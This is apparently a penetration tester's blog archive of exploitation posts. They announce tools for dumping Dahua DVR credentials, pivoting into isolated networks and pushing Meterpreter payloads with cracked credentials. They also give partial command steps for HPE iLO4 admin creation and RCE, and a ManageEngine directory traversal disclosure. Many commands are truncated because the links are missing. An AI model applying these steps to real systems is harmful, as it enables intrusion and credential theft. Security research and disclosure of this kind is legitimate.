Archive for the ‘Exploitation’ Category

CVE-2013-6117 – Tool (Multithreaded and Extremely Fast)

July 23, 2018 Leave a comment

I wrote a simple script in Go to test if the target Dahua DVR device is vulnerable to authentication bypass flaw (CVE-2013-6117).

Dahua DVRs listen on TCP port 37777 by default.

If it is vulnerable, it will dump the credentials along with the dynamic dns name (DynDNS).

Some system administrators might use the same password for other systems. Therefore, a penetration tester might be able to use the credentials obtained from the DVR to gain further access into the network by accessing other systems or applications.

As the script is written in Go, it makes the tool extremely fast.

For more information regarding this vulnerability, you might want to check out

Screen Shot 2018-07-24 at 2.06.12 AM.png
The script can be downloaded from


Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

June 30, 2018 Leave a comment

The below contains some of my own notes for exploiting CVE-2017-12542.  The below notes are incomplete. I will spend some time on how to get RCE on other version of firmwares for HP iLO (as explained below).

List / Add users on the HP iLO
If you just need to list or add accounts on the HP iLO, you can just use the script from or Metasploit module (

$ git clone
$ cd CVE-2017-12542
$ python -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator


$ python /pentest/CVE-2017-12542/ -u newadmin -p newadmin x.x.x.x

RCE on the HP iLO
The RCE/Backdoor exploit at currently only works for the below firmwares. Some modifications might be required to work on other versions.

Based on HP’s advisory (, iLO 4 prior to versions 2.53 are vulnerable.

The firmware for HP iLO can be downloaded from

Steps on how to get command execution on HP iLO and extract passwords

$ git clone

$ curl -s -k  https://x.x.x.x/xmldata?item=all | grep -i “<FWRI>”

$ wget

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

cd ilo4_toolbox/scripts/iLO4/

$ ./ ilo4_253.bin

$ python x.x.x.x


Categories: Exploitation

Jumping from Corporate to Compromising Semi-Isolated Network

September 21, 2017 1 comment

Finding and attacking hosts in Semi-Isolated networks
The new script ‘hopandhack‘ can be used by attackers to automatically find and hunt down hosts that are not directly accessible from the attacker’s machine.  In some organizations, IT administrators have to use something called a ‘jump box’ or VPN to access the secure data centre or PCI network where sensitive data are stored .

The ‘hopandhack’ script automates the process of finding hosts with the necessary routes to these secure network and compromises them.  The functionality of hopandhack will be incorporated into Portia in the next week or so.

hopandhack script can be found at under the filename ‘’.

Basic Workflow of how the attack works.

Below is a video demo as presented at Rootcon (2017).  In the video, the attacker is able to access one host (host A) but not the other host (host B) thats in the secure network.

Host A has an active route to host B.  In order to compromise host B, the attacker has to setup a relay from host A to host B and then use this relay to dump credentials/hashes from host B.

More functionalities will be added in future.

The tool is currently available as a standalone tool and its functionalities will be ported over to Portia in the following week.

The slides from Rootcon 2017 is available at

metasploitHelper and nmap2nessus released at Blackhat Asia Arsenal 2015

March 30, 2015 Leave a comment

@mgianarakis and me (@keith55) presented two new tools (metasploitHelper and nmap2nessus) at Blackhat Asia Arsenal in Singapore on 26th and 27th of March, 2015.

The tools were developed to help guys like us during vulnerability assessments and penetration tests.

Blog posts about the tools will be coming soon. Meanwhile, the information on the Github pages should be sufficient to get you started.
The tools are open source.  Feel free to contribute to the projects. Thank you



Test AS/400 for default credentials

December 7, 2014 Leave a comment

I wrote a simple script to test default credentials in AS/400. I made use of the library and sample code from  It currently only works with IBM AS/400 telnet servers for now.

You can pull the code from
You will have to supply the ip and port of the AS400 server in the command line

Help screen for AS/400 tool

Below is a screenshot of the tool in action.

Test AS/400 Default Credentials


August 27, 2014 Leave a comment


– Python2.7
– Impacket (svn checkout impacket-read-only)
– Ruby
– Veil Evasion (git clone


If you are working on a penetration test remotely, its sometimes hard to determine when the users start work or connect their laptops to the network.

winboxHunter is useful if you have managed to capture and cracked a bunch of NTLM credentails and want to run Metasploit against these windows boxes as and when they are connected to the network.

winboxHunter listens for NBNS broadcast packets so that when a new winBox is connected to the network, it will use the Impacket scripts ( and to push an executable onto the winBox and runs it.

In the background, winboxHunter runs Metasploit with payload handler (multi/handler) and listens for incoming connections from the winboxes.

You might want to modify autorunCmd.rc to specify the Metasploit commands you want to run on the pwned winbox upon connecting back to Metasploit.

See meterpreter.rc and autorunCmd.rc for more details.

If a host changes its IP address due to DHCP lease expiration, it will not attempt to exploit the winbox twice.

Format of password.txt

domain/username password


Meterpreter executable

You only need to use one of the below 2 options

– You can either use your own meterpreter payload executable using the -e or –exe argument (payload=windows/meterpreter/reverse_https, rport=8443) or

– You can use the -n or –enableVeil argument to generate a meterpreter payload executable using Veil Evasion
You can run winboxHunter using the below sample command

ruby winboxHunter.rb -n -f password.txt -v

When you run winboxHunter, a linux screen with the name “msfscreen” will be created and msfconsole will be executed. You can connect to the screen via the below command

screen -dr msfscreen

The source code for winboxHunter can be found at

Oracle Exploitation – Privilege Escalation

September 7, 2013 Leave a comment


Many times during Penetration Tests, we found a limited account for the Oracle database server.  The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges.  The Metasploit modules scripts below are for different varying versions of Oracle database servers. I cant remember which Metasploit modules are for which versions.

Metasploit Oracle SQL Injection Modules

To speed things up, I wrote a script that does the below

(1) Check if the account specified has access to the database
(2) Check if the account has DBA privileges
(3) If no, check the version of the Oracle database server
(4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk
(5) Run the Metasploit resource script and attempt to gain DBA privileges
(6) Check permissions of account and verifies if DBA privileges have been obtained. script script

The script is still a work in progress.  You can download the script via the below link.

Categories: Exploitation, Oracle

WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload vulnerability (CVE-2013-3684)

August 10, 2013 Leave a comment

I converted the original WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload exploit from Perl to Python for fun.

The original exploit can be found at

Below is the python script for CVE-2013-3684


Categories: Exploitation

Vuln Details for ManageEngine ServiceDesk Plus 8.0 Released

June 23, 2011 Leave a comment

I have been working with ManageEngine support team on getting the issue fixed and also informing the customers to patch their system with the latest service pack release version 8012 for over a month plus.

The vulnerability has been published in the below sites.

Below are the details of the vulnerability.

Google Dork: ie: intitle:ManageEngine ServiceDesk Plus”
Author: Keith Lee (
/* */
), @keith55,
Software Link:
Version: 8.0


Directory traversal vulnerabilities has been found in ManageEngine
ServiceDesk Plus 8.0 a web
based helpdesk system written in Java.

The vulnerability can be exploited to access local files by entering
special characters in variables used to create file paths. The attackers
use �../� sequences to move up to root directory, thus permitting
navigation through the file system.

GET http://%5Bwebserver

The issue is fixed with Service Pack Build 8012 found in the below link.

Categories: Exploitation

Found a zero day for major helpdesk system

June 18, 2011 Leave a comment

Watch this space. I will publish this in the next couple of days. Most companies published their help desk on the Internet.

Categories: Exploitation